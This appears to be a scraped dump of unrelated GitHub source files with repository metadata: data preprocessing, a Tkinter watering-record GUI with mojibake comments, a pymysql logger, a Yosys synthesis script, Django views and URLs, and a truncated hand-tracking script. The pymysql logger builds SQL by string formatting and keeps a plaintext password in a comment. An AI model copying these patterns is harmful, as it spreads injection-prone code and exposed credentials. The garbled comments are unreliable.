apps/accounts/auth_adapter.py
|
auth_adapter.py
|
py
| 1,443
|
python
|
en
|
code
| 284
|
github-code
|
6
|
16647141836
|
import os
import pandas as pd
import numpy as np
from tqdm.auto import tqdm
from textaugment import EDA
from nltk.tokenize import word_tokenize
class DataProcessing:
def __init__(self, input_path, output_path):
self.input_path = input_path
self.output_path = output_path
self.X = None
self.label = None
self.text = None
def read_file(self):
data = pd.read_csv(self.input_path, names=['text', 'label'])
self.text = data.text
if not data.label.isnull().all():
self.label = data.label
def convert_to_vector(self, emb_dict):
X = []
emb_len = len([*emb_dict.values()][0])
for sentence in self.text.values:
vector = np.zeros((1, emb_len))
words = [word for word in sentence.split() if word in emb_dict.keys()]
if len(words):
vector = np.mean([emb_dict[w] for w in words], axis=0)
X.append(vector)
self.X = np.vstack(X)
def augment_text(self, def_val=3):
eda = EDA()
avg = int(len(self.label) / self.label.nunique())
small_classes = (self.label.value_counts().reset_index(name='cnt')
.query(f'cnt < {avg}')['index'].values)
for cl in tqdm(small_classes):
tmp_df = self.text[self.label == cl]
for sentence in tmp_df.values:
text_aug = pd.Series([eda.synonym_replacement(sentence)
for _ in range(def_val)])
if sum(self.label==cl) > avg:
break
self.text = self.text.append(text_aug, ignore_index=True)
self.label = self.label.append(pd.Series([cl] * def_val),
ignore_index=True)
def shuffle_data(self):
new_index = np.random.randint(len(self.label), size=len(self.label))
self.label = self.label[new_index]
self.text = self.text[new_index]
def save_data(self):
np.save(os.path.join(self.output_path, 'X.npy'), self.X)
if self.label is not None:
np.save(os.path.join(self.output_path, 'Y.npy'),
self.label.to_numpy())
@staticmethod
def load_embedding(file_path):
embedding_dict = {}
with open(file_path, 'r') as f:
for line in tqdm(f):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], 'float32')
embedding_dict[word] = vectors
f.close()
return embedding_dict
|
marynadorosh/test_task
|
src/data/make_dataset.py
|
make_dataset.py
|
py
| 2,626
|
python
|
en
|
code
| 0
|
github-code
|
6
|
31437732860
|
#!/bin/usr/python3
# Coding: utf-8
# Author: Rogen
# Description: ๆคๆ ช็ๆบ็ด้
from tkinter import ttk, messagebox
from GUI_language import *
import subprocess
import csv, os
import pandas as pd
import tkinter as tk
class Water_management(object):
def __init__(self,ver,code):
self.language = ver
self.internal_code = code
self.NodeAnswer = 'NodeAnswer.exe'
self.SaveCSV = './Dataset/Planting_Water.csv'
if self.language == 1:
ch = Chinese()
self.interface = ch.Plating_Management()
else:
en = English()
self.interface = en.Plating_Management()
# ็ๆบ็ด้ๅฒๅญ
def submit(self):
situation = self.check()
tag = 0
if situation == 1:
mylist = []
# Add tea site in the name
tag = 1 if os.path.exists(self.SaveCSV) else 0
with open(self.SaveCSV, 'a', encoding='utf_8_sig') as f:
if tag == 0:
f.write('Internal_Code,Sprinkler_Density_W,Sprinkler_Density_H,Frequence,Amount,Electric_Bill_Year,Water_Bill_Year,Water_Bill_Degreed\n')
mylist.append(self.internal_code)
for z in range(7):
mylist.append(self.water_info[z].get())
f.write(','.join(mylist)+'\n')
mylist.clear()
self.hidden_node_answer()
self.pw_delete_window()
# ็ขบ่ช่กจๆ ผๆฏๅฆๆๅกซๅฏซ
def check(self):
self.validation_box.delete(1.0,tk.END)
empty = []; situation = 1
for i in range(len(self.water_info)):
if self.water_info[i].get() == '':
if i == 0 or i == 1:
empty.append(self.interface['water']['sprinkler_density'])
elif i == 2:
empty.append(self.interface['water']['frequence'])
'''
# ไปฅไธไธๅผทๅถ่ฆๆฑไฝฟ็จ่
่ผธๅ
ฅ
elif i == 3:
empty.append(self.interface['water']['amount'])
elif i == 4:
empty.append(self.interface['water']['electric_bill_year'])
elif i == 5:
empty.append(self.interface['water']['bill_year'])
elif i == 6:
empty.append(self.interface['water']['bill_degree'])
'''
if len(empty):
situation = 0
for e in empty:
if self.language == 1:
self.validation_box.insert(1.0,'%s ๆชๅกซๅฏซ...\n' % e)
elif self.language == 2:
self.validation_box.insert(1.0,'%s is empty...\n' % e.replace('\n',''))
return(situation)
# ่ฆ็ช้้่ฟๅไธป้ธๅฎ
def pw_delete_window(self):
from Option_List import optionlist
self.water.destroy()
manu = optionlist(self.language)
manu.main()
# ๅผๅซ"NodeAnswer.exe"็จๅผ (ๅฉ็จ็ๆบ็ด้ไพๅ็ญๅฐๅฎถ็ณป็ตฑๅ้ก)
def hidden_node_answer(self):
p = subprocess.run(self.NodeAnswer, shell=True)
# ่ถๅ็ๆบ็ด้ไฟฎๆน
def watering_edit(self):
x = 1 # Escape the colunm of Internal_Code
if os.path.exists(self.SaveCSV):
pw_df = pd.read_csv(self.SaveCSV,encoding='utf_8_sig',delimiter=',')
try:
index = pw_df.index[pw_df['Internal_Code'] == self.internal_code].tolist()[-1]
for ob in self.water_info:
if str(pw_df.iloc[index,x]) == 'nan':
pw_df.iloc[index,x] = ''
ob.set(pw_df.iloc[index,x])
x = x+1
except IndexError as e:
tk.messagebox.showerror('ERROR','You do not recode any infomation!')
else:
tk.messagebox.showerror('ERROR','You do not recode any infomation!')
# ไธป็จๅผไป้ข
def main(self):
self.water = tk.Tk()
self.water.geometry('620x415')
self.water.resizable(width=False,height=False)
self.water.title(self.interface['water']['title'])
self.water.protocol("WM_DELETE_WINDOW",self.pw_delete_window)
sprinkler_density_width = tk.StringVar()
sprinkler_density_heigh = tk.StringVar()
watering_frequence = tk.StringVar()
watering_volume = tk.StringVar()
electric_bill_year = tk.StringVar()
water_bill_year = tk.StringVar()
water_bill = tk.StringVar()
self.water_info = [sprinkler_density_width,sprinkler_density_heigh,watering_frequence,watering_volume,electric_bill_year,water_bill_year,water_bill]
self.watering_list = ['3-5ๅคฉไธๆฌก','ๆฏๅจไธๆฌก','ๆฏๆฌไธๆฌก','ๆฏๅ
ฉ้ฑไธๆฌก','ๆฏๆไธๆฌก','่กจๅไนพๅณ็ๆบ']
water_frame = tk.Frame(self.water,highlightbackground='blue',highlightcolor='black',highlightthickness=1,bd=5)
water_frame.place(x=10,y=20,width=600,height=100)
tk.Label(water_frame,text=self.interface['water']['sprinkler_density']).grid(row=0,column=0)
tk.Label(water_frame,text=self.interface['water']['frequence']).grid(row=0,column=1)
tk.Label(water_frame,text=self.interface['water']['amount']).grid(row=0,column=2)
tk.Label(water_frame,text=self.interface['water']['electric_bill_year']).grid(row=0,column=3)
tk.Label(water_frame,text=self.interface['water']['bill_year']).grid(row=0,column=4)
tk.Label(water_frame,text=self.interface['water']['bill_degree']).grid(row=0,column=5)
sprinkler_frame = tk.Frame(water_frame)
sprinkler_frame.grid(row=1,column=0,padx=3,pady=5)
for k in range(7):
if k == 0:
tk.Entry(sprinkler_frame,textvariable=self.water_info[k],width=4).grid(row=0,column=k,padx=2,pady=5)
tk.Label(sprinkler_frame,text='mx').grid(row=0,column=k+1,padx=2,pady=5)
elif k == 1:
tk.Entry(sprinkler_frame,textvariable=self.water_info[k],width=4).grid(row=0,column=k+2,padx=2,pady=5)
tk.Label(sprinkler_frame,text='m').grid(row=0,column=k+3,padx=2,pady=5)
elif k == 2:
watering_combox = ttk.Combobox(water_frame,textvariable=self.water_info[k],values=self.watering_list,width=11,state='readonly')
watering_combox.grid(row=1,column=k-1,padx=2,pady=5)
else:
tk.Entry(water_frame,textvariable=self.water_info[k],width=11).grid(row=1,column=k-1,padx=2,pady=5)
tk.Button(self.water,text=self.interface['button']['button']['submit'],width=7,command=self.submit).place(x=530,y=140)
tk.Button(self.water,text='Edit',width=7,command=self.watering_edit).place(x=450,y=140)
self.validation_box = tk.Text(self.water, bg='lightgray', width=85, height=10)
self.validation_box.place(x=10,y=190)
self.water.mainloop()
# if __name__ == '__main__':
# w = Water_management(1,'000-0001')
# w.main()
|
NCHU-rogen/ExpertSystem_Project
|
Planting_water.py
|
Planting_water.py
|
py
| 5,947
|
python
|
en
|
code
| 0
|
github-code
|
6
|
16270189491
|
import pymysql
import datetime
def insert(outsideTemp, insideTemp, targetTemp, fanState):
sql = "INSERT INTO FANS ( `time`, `outside_temp`, `inside_temp`, `target_temp`, `fan_state`) "
sql += "VALUES ( \"{0}\", {1}, {2}, {3}, {4})".format(datetime.datetime.now(), outsideTemp, insideTemp, targetTemp, fanState)
try:
connection = pymysql.connect(host='localhost', db='fans')
#connection = pymysql.connect(host='localhost', user='root', db='fans', password='c0staRic4')
#connection = pymysql.connect(host='localhost', user='pi', db='fans')
cursor = connection.cursor()
#print(sql)
cursor.execute(sql)
connection.commit()
finally:
connection.close()
def select_today():
sql = "SELECT * FROM FANS WHERE DATE(time)=CURRENT_DATE()"
return select_sql(sql)
def select_last():
sql="select * from FANS order by time desc limit 1"
return select_sql(sql)
def select_sql(sql):
try:
connection = pymysql.connect(host='localhost', db='fans')
cursor = connection.cursor()
cursor.execute(sql)
result = cursor.fetchall()
finally:
connection.close()
return result
'''
CREATE USER 'pi'@'localhost';
GRANT ALL on *.* to 'pi'@'localhost' WITH GRANT OPTION;
create database fans;
use fans;
CREATE TABLE `FANS` (
`time` TIMESTAMP NOT NULL,
`outside_temp` FLOAT NOT NULL,
`inside_temp` FLOAT NOT NULL,
`target_temp` FLOAT NOT NULL,
`fan_state` BOOLEAN NOT NULL,
PRIMARY KEY (`time`)
);
INSERT INTO fans ( `time`, `outside_temp`, `inside_temp`, `fan_state`)
VALUES ( datetime.datetime.now(), 56.7, 74.0, TRUE )
'''
|
scottware/fans
|
database.py
|
database.py
|
py
| 1,653
|
python
|
en
|
code
| 0
|
github-code
|
6
|
27513964476
|
# -*- coding: utf-8 -*-
import os
import sys
import io
import math
def synthesize_asic_entity(yosys_location, yosys_synth_script, target_cell, entity_name, timing_constraint, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
# Check if folder exists for the target cell, if not, create it
int_synthesis_output_folder = int_synthesis_output_folder + '/' + target_cell['name']
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_ASIC_CELL_LOCATION=' + target_cell['liberty_file'] + ' '
command = command + 'SYNTH_ASIC_PIN_CONSTRAINTS=' + target_cell['pin_constr_file'] + ' '
command = command + 'SYNTH_TIMING_CONSTRAINT=' + timing_constraint + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
print(command)
os.system(command)
# Open log and look for the delay and area results
result_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.result'
# Area string to look for
area_result_line_1 = 'Chip area for module ' + "'" + "\\" + entity_name + "':"
area_result_line_2 = 'Chip area for top module ' + "'" + "\\" + entity_name + "':"
possible_area_result_lines = []
# Delay string to look for
delay_result_line = 'Delay ='
possible_delay_result_lines = []
with open(log_filename, "r") as log_file:
for log_line in log_file:
if (delay_result_line in log_line):
possible_delay_result_lines += [log_line]
if (area_result_line_1 in log_line):
possible_area_result_lines += [log_line]
if (area_result_line_2 in log_line):
possible_area_result_lines += [log_line]
# Only write the biggest area found for the top architecture
if(len(possible_area_result_lines) <= 1):
biggest_area_line = 0
else:
biggest_area_line = 0
temp_line_splitted = possible_area_result_lines[0].split(":")
biggest_area_line_result = float((temp_line_splitted[1]).strip())
for i in range(1, len(possible_area_result_lines)):
temp_line_splitted = possible_area_result_lines[i].split(":")
temp_area_line_result = float((temp_line_splitted[1]).strip())
if(temp_area_line_result > biggest_area_line_result):
biggest_area_line = i
biggest_area_line_result = temp_area_line_result
# Only write the first delay found. This needs to be redone, because ABC doesn't give proper delay results for non flattened results.
with open(result_filename, "w") as result_file:
result_file.write(possible_area_result_lines[biggest_area_line])
result_file.write(possible_delay_result_lines[0])
def synthesize_simple_entity(yosys_location, yosys_synth_script, entity_name, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
print(command)
os.system(command)
def synthesize_asic_list(yosys_location, all_yosys_synth_scripts, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_std_cell in all_target_cells:
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
synthesize_asic_entity(yosys_location, each_yosys_synth_ecript, each_std_cell, each_entity, each_timing_constraint, synthesis_output_folder)
def synthesize_simple_list(yosys_location, all_yosys_synth_scripts, all_entity_names, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_entity in all_entity_names:
synthesize_simple_entity(yosys_location, each_yosys_synth_ecript, each_entity, synthesis_output_folder)
def generate_csv_with_all_results(all_yosys_asic_synth_script, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
area_result_line = 'Chip area'
delay_result_line = 'Delay ='
csv_file_name = synthesis_output_folder + '/' + 'results.csv'
for each_yosys_synth_ecript in all_yosys_asic_synth_script:
with io.open(csv_file_name, "w", encoding="ascii", newline='') as csv_file:
line = '"Entity Name","Technology","Timing Constraint","Area","GE","Delay"\r\n'
csv_file.write(unicode(line, encoding="ascii"))
for each_std_cell in all_target_cells:
nand_size = 0.0
with open(each_std_cell['nand_file'], "r") as nand_file:
nand_size = float(nand_file.readline())
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
line = '"' + each_entity + '"' + ',' + '"' + each_std_cell['name'] + '"' + ',' + '"' + each_timing_constraint + '"' + ','
result_filename = synthesis_output_folder + '/' + each_yosys_synth_ecript[:-4] + '/' + each_std_cell['name'] + '/' + each_entity + '__t_' + each_timing_constraint + '.result'
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(area_result_line in result_line):
area_line_splitted = result_line.split(":")
area_result = (area_line_splitted[1]).strip()
line = line + '"' + area_result + '"' + ','
area_result_ge = str(int(math.ceil(float(area_result)/nand_size)))
line = line + '"' + area_result_ge + '"' + ','
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(delay_result_line in result_line):
delay_line_splitted = result_line.split(delay_result_line)
delay_result = ((delay_line_splitted[1]).split())[0]
line = line + '"' + delay_result + '"'
line = line + '\r\n'
csv_file.write(unicode(line, encoding="ascii"))
# STD cells descriptions
asic_cells_base_folder = '/home/pedro/asic_cells/'
gscl45nm_library = {
'name' : 'gscl45nm',
'liberty_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.lib',
'pin_constr_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.constr',
'nand_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.nand',
}
nangate1_library = {
'name' : 'NangateOpenCellLibrary_typical_ccs',
'liberty_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.lib',
'pin_constr_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.constr',
'nand_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.nand',
}
# Adding cells to the list
all_std_cells_libraries = []
all_std_cells_libraries += [gscl45nm_library]
all_std_cells_libraries += [nangate1_library]
yosys_location = 'yosys'
all_yosys_asic_synth_script = ['synth_asic.tcl']
all_yosys_simple_synth_script = ['synth_simple.tcl']
# All timing constraints
all_timing_constraints = []
all_timing_constraints += ['10000']
# All entity names
all_entity_names = []
all_entity_names += ['subterranean_round']
all_entity_names += ['subterranean_rounds_simple_1']
all_entity_names += ['subterranean_rounds_simple_2']
all_entity_names += ['subterranean_rounds_simple_4']
# Synthesis output folder
synthesis_output_folder = 'synth_out'
if __name__ == "__main__" :
if(len(sys.argv) == 1):
print('This is a basic synthesizes script')
print('')
print('You can try to synthesize an entity not named here by just writing the name directly')
print('synth.py entity_name')
print('')
print('You can also synthesize one of the entities already listed here by writing -l and their number')
print('synth.py -l 0 1 2')
print('')
print('If you want everyone to be synthesized you can also just run -all')
print('synth.py -all')
print('')
print('If you want to generate asic csv report use -g')
print('synth.py -g')
print('')
print('Here are all timings in the script')
for i in range(len(all_timing_constraints)):
print(all_timing_constraints[i])
print('')
print('Here are all entities already in the script')
for i in range(len(all_entity_names)):
print(str(i) + ' - ' + all_entity_names[i])
else:
if(sys.argv[1] == '-all'):
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, all_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-l'):
selected_entity_names = []
list_of_numbers = [str(i) for i in sys.argv[2:]]
list_of_numbers = " ".join(list_of_numbers)
for i in range(len(all_entity_names)):
if(str(i) in list_of_numbers):
selected_entity_names += [all_entity_names[i]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, selected_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, selected_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-g'):
generate_csv_with_all_results(all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
else:
new_entity_name = [sys.argv[2]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, new_entity_name, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, new_entity_name, synthesis_output_folder)
|
tintin10q/subterranean2digital
|
Reference_code/verilog_project/yosys_synth/synth.py
|
synth.py
|
py
| 11,689
|
python
|
en
|
code
| 0
|
github-code
|
6
|
26625188476
|
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from product.modules.downloadable.models import DownloadLink
from satchmo_store.shop.signals import sendfile_url_for_file
import mimetypes
import os
import os.path
import re
from urlparse import urljoin
SHA1_RE = re.compile('^[a-f0-9]{40}$')
def _validate_key(download_key):
"""
Helper function to make sure the key is valid and all the other constraints on
the download are still valid.
Returns a tuple (False,"Error Message", None) or (True, None, dl_product)
"""
download_key = download_key.lower()
if not SHA1_RE.search(download_key):
error_message = _("The download key is invalid.")
return (False, error_message, None)
try:
dl_product = DownloadLink.objects.get(key=download_key)
except:
error_message = _("The download key is invalid.")
return (False, error_message, None)
valid, msg = dl_product.is_valid()
if not valid:
return (False, msg, None)
else:
return (True, None, dl_product)
def process(request, download_key):
"""
Validate that the key is good, then set a session variable.
Redirect to the download view.
We use this two step process so that we can easily display meaningful feedback
to the user.
"""
valid, msg, dl_product = _validate_key(download_key)
if not valid:
context = RequestContext(request, {'error_message': msg})
return render_to_response('shop/download.html',
context_instance=context)
else:
# The key is valid so let's set the session variable and redirect to the
# download view
request.session['download_key'] = download_key
url = urlresolvers.reverse('satchmo_download_send', kwargs= {'download_key': download_key})
context = RequestContext(request, {'download_product': dl_product,
'dl_url' : url})
return render_to_response('shop/download.html', context_instance=context)
def send_file(request, download_key):
"""
After the appropriate session variable has been set, we commence the download.
The key is maintained in the url but the session variable is used to control the
download in order to maintain security.
"""
if not request.session.get('download_key', False):
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': download_key})
return HttpResponseRedirect(url)
valid, msg, dl_product = _validate_key(request.session['download_key'])
if not valid:
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': request.session['download_key']})
return HttpResponseRedirect(url)
# some temp vars
file = dl_product.downloadable_product.file
file_url = '/%s' % file.name # create an absolute/root url
# poll listeners
url_dict = {'url': file_url}
sendfile_url_for_file.send(
None, file=file,
product=dl_product.downloadable_product,
url_dict=url_dict,
)
# url may have changed; update it
file_url = url_dict['url']
# get file name from url
file_name = os.path.basename(file_url)
dl_product.num_attempts += 1
dl_product.save()
del request.session['download_key']
response = HttpResponse()
# For Nginx
response['X-Accel-Redirect'] = file_url
# For Apache and Lighttpd v1.5
response['X-Sendfile'] = file_url
# For Lighttpd v1.4
response['X-LIGHTTPD-send-file'] = file_url
response['Content-Disposition'] = "attachment; filename=%s" % file_name
response['Content-length'] = file.size
contenttype, encoding = mimetypes.guess_type(file_name)
if contenttype:
response['Content-type'] = contenttype
return response
|
dokterbob/satchmo
|
satchmo/apps/product/modules/downloadable/views.py
|
views.py
|
py
| 4,066
|
python
|
en
|
code
| 30
|
github-code
|
6
|
40633067575
|
from django.urls import path
from .views import (
add_to_cart,
delete_from_cart,
order_details,
checkout,
update_transaction_records,
success
)
app_name = 'cart'
urlpatterns = [
path('^add-to-cart/<int:pk>/<slug:slug>/', add_to_cart, name="add_to_cart"),
path('^order-summary/', order_details, name="order_summary"),
path('^success/$', success, name='purchase_success'),
path('^item/delete/<int:pk>/<slug:slug>/', delete_from_cart, name='delete_item'),
path('^checkout/', checkout, name='checkout'),
# path('^update-transaction/(?P<token>[-\w]+)/', update_transaction_records,
# name='update_records')
]
|
sadakchap/cfe-ecom
|
cart/urls.py
|
urls.py
|
py
| 662
|
python
|
en
|
code
| 0
|
github-code
|
6
|
20164701509
|
import cv2
import mediapipe as mp
from handLandmarksDefine import *
from objectCoords import *
import time
import numpy as np
import math
import serial
start_time = 0
end_time = 0
try:
arduino = serial.Serial('COM3', 9600)
except serial.serialutil.SerialException:
print("Arduino not connected")
# lm = landmark
class HandLandmarkDetector:
def __init__(self, static_image_mode, max_num_hands, model_complexity, min_detection_confidence,
min_tracking_confidence):
self.static_image_mode = static_image_mode
self.max_num_hands = max_num_hands
self.model_complexity = model_complexity
self.min_detection_confidence = min_detection_confidence
self.min_tracking_confidence = min_tracking_confidence
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.static_image_mode, self.max_num_hands, self.model_complexity,
self.min_detection_confidence, self.min_tracking_confidence)
self.mpDraw = mp.solutions.drawing_utils
self.results = None
def draw_hand_landmarks(self, img):
img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(img_rgb)
if self.results.multi_hand_landmarks:
for self.handLMS in self.results.multi_hand_landmarks:
self.mpDraw.draw_landmarks(img, self.handLMS, self.mpHands.HAND_CONNECTIONS)
return img
def find_hand_landmark_coordinates(self, img):
landmark_list = []
if self.results.multi_hand_landmarks:
for id, lm in enumerate(self.handLMS.landmark):
print(id,lm)
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
landmark_list.append([id, cx, cy])
cv2.circle(img, (cx, cy), 7, (255, 255, 255), cv2.FILLED)
return landmark_list
class HandTracker:
def __init__(self, width, height, top_left_x, top_left_y, color, thickness):
self.width = width
self.height = height
self.top_left_x = top_left_x
self.top_left_y = top_left_y
self.color = color
self.thickness = thickness
self.object_assembled = False
def reset_sizes(self, width, height, top_left_x, top_left_y, color, thickness):
self.width = width
self.height = height
self.top_left_x = top_left_x
self.top_left_y = top_left_y
self.color = color
self.thickness = thickness
def draw(self, img):
cv2.rectangle(img, (self.top_left_x, self.top_left_y), (self.top_left_x + self.width, self.top_left_y +
self.height), self.color, self.thickness)
def set_green_color(self):
self.color = (0, 255, 0)
self.object_assembled = True
def set_red_color(self):
self.color = (0, 0, 255)
self.object_assembled = False
def set_object_assembled_false(self):
self.object_assembled = False
def set_object_assembled_true(self):
self.object_assembled = True
def detect_hand_inside_area(self, landmark_list):
global start_time
global end_time
if len(landmark_list) != 0 and self.object_assembled is False:
if self.top_left_x <= landmark_list[INDEX_FINGER_TIP][1] <= self.top_left_x + self.width and self.top_left_y <= landmark_list[INDEX_FINGER_TIP][2] <= self.top_left_y + self.height\
and self.top_left_x <= landmark_list[THUMB_TIP][1] <= self.top_left_x + self.width and self.top_left_y <= landmark_list[THUMB_TIP][2] <= self.top_left_y + self.height:
self.color = (0, 255, 0)
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 3
# print("end time: ")
# print(end_time)
# print("current time: ")
# print(time.time())
else:
if time.time() > end_time:
start_time = 0
end_time = 0
return 1
else:
self.color = (0, 0, 255)
def gesture_control(self, landmark_list, resized_frame, arduino):
global start_time
global end_time
if len(landmark_list) != 0:
x1, y1 = landmark_list[THUMB_TIP][1], landmark_list[THUMB_TIP][2]
x2, y2 = landmark_list[INDEX_FINGER_TIP][1], landmark_list[INDEX_FINGER_TIP][2]
cx, cy = (x1 + x2) // 2, (y1 + y2) // 2
cv2.circle(resized_frame, (x1, y1), 15, (255, 0, 255), cv2.FILLED)
cv2.circle(resized_frame, (x2, y2), 15, (255, 0, 255), cv2.FILLED)
cv2.line(resized_frame, (x1, y1), (x2, y2), (255, 0, 255), 3)
cv2.circle(resized_frame, (cx, cy), 15, (255, 0, 255), cv2.FILLED)
length = math.hypot(x2 - x1, y2 - y1)
vol = np.interp(length, [70, 250], [0, 250])
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 1
# print("end time: ")
# print(end_time)
# print("current time: ")
# print(time.time())
else:
if time.time() > end_time:
start_time = 0
end_time = 0
arduino.write(str(vol).encode())
class ObjectAssembler:
def draw_work_area(self, resized_frame, work_area_top_left, work_area_bottom_right, work_area_color,
work_area_thickness, text_content, text_font, text_font_scale, text_color, text_thickness):
cv2.rectangle(resized_frame, work_area_top_left, work_area_bottom_right, work_area_color, work_area_thickness)
text_x = work_area_top_left[0] + 5
text_y = work_area_top_left[1] + 30
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def draw_component_area(self, resized_frame,component_area_top_left, component_area_bottom_right,
component_area_color, component_area_thickness, text_content, text_font, text_font_scale,
text_color, text_thickness):
cv2.rectangle(resized_frame, component_area_top_left, component_area_bottom_right, component_area_color,
component_area_thickness)
text_x = component_area_top_left[0] + 5
text_y = component_area_top_left[1] + 30
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def draw_breadboard_outline(self, resized_frame, breadboard_top_left, breadboard_bottom_right,
breadboard_outline_color, breadboard_outline_thickness):
cv2.rectangle(resized_frame, breadboard_top_left, breadboard_bottom_right, breadboard_outline_color,
breadboard_outline_thickness)
def draw_next_component(self, resized_frame, next_top_left, next_bottom_right, next_color, next_thickness,
text_content, text_font, text_font_scale, text_color, text_thickness):
cv2.rectangle(resized_frame, next_top_left, next_bottom_right, next_color, next_thickness)
text_x = next_top_left[0] + 40
text_y = next_top_left[1] + 500
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def draw_previous_component(self, resized_frame, previous_top_left, previous_bottom_right, previous_color,
previous_thickness, text_content, text_font, text_font_scale, text_color,
text_thickness):
cv2.rectangle(resized_frame, previous_top_left, previous_bottom_right, previous_color, previous_thickness)
text_x = previous_top_left[0] + 10
text_y = previous_top_left[1] + 500
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def detect_finger_inside_next_component(self, landmark_list, next_top_left, next_bottom_right):
global start_time
global end_time
if len(landmark_list) != 0:
if next_top_left[0] <= landmark_list[PINKY_TIP][1] <= next_bottom_right[0] and \
next_top_left[1] <= landmark_list[PINKY_TIP][2] <= next_bottom_right[1]:
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 3
else:
if time.time() > end_time:
start_time = 0
end_time = 0
return 1
def detect_finger_inside_previous_component(self, landmark_list, previous_top_left, previous_bottom_right):
global start_time
global end_time
if len(landmark_list) != 0:
if previous_top_left[0] <= landmark_list[THUMB_TIP][1] <= previous_bottom_right[0] and \
previous_top_left[1] <= landmark_list[THUMB_TIP][2] <= previous_bottom_right[1]:
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 3
else:
if time.time() > end_time:
start_time = 0
end_time = 0
return 1
def resize_window(img, max_width, max_height):
original_height, original_width, _ = img.shape
scale_x = max_width / original_width
scale_y = max_height / original_height
scale = min(scale_x, scale_y)
new_width = int(original_width * scale)
new_height = int(original_height * scale)
return new_width, new_height
def main():
cap = cv2.VideoCapture(0)
success, img = cap.read()
new_width, new_height = resize_window(img, max_width=1680, max_height=1050)
cv2.namedWindow('Scaled Video', cv2.WINDOW_NORMAL)
cv2.resizeWindow('Scaled Video', new_width, new_height)
cv2.setWindowProperty('Scaled Video', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
hand_detector = HandLandmarkDetector(static_image_mode=False, max_num_hands=1, model_complexity=1,
min_detection_confidence=0.1, min_tracking_confidence=0.1)
i = 0
gestureControl = False
rectangle_width = [ARDUINO_WIDTH, LED_WIDTH, LED_BAR_WIDTH]
rectangle_height = [ARDUINO_HEIGHT, LED_HEIGHT, LED_BAR_HEIGHT]
rectangle_top_left_x = [ARDUINO_X, LED_X, LED_BAR_X]
rectangle_top_left_y = [ARDUINO_Y, LED_Y, LED_BAR_Y]
rectangle_color = (0, 0, 255)
rectangle_thickness = 2
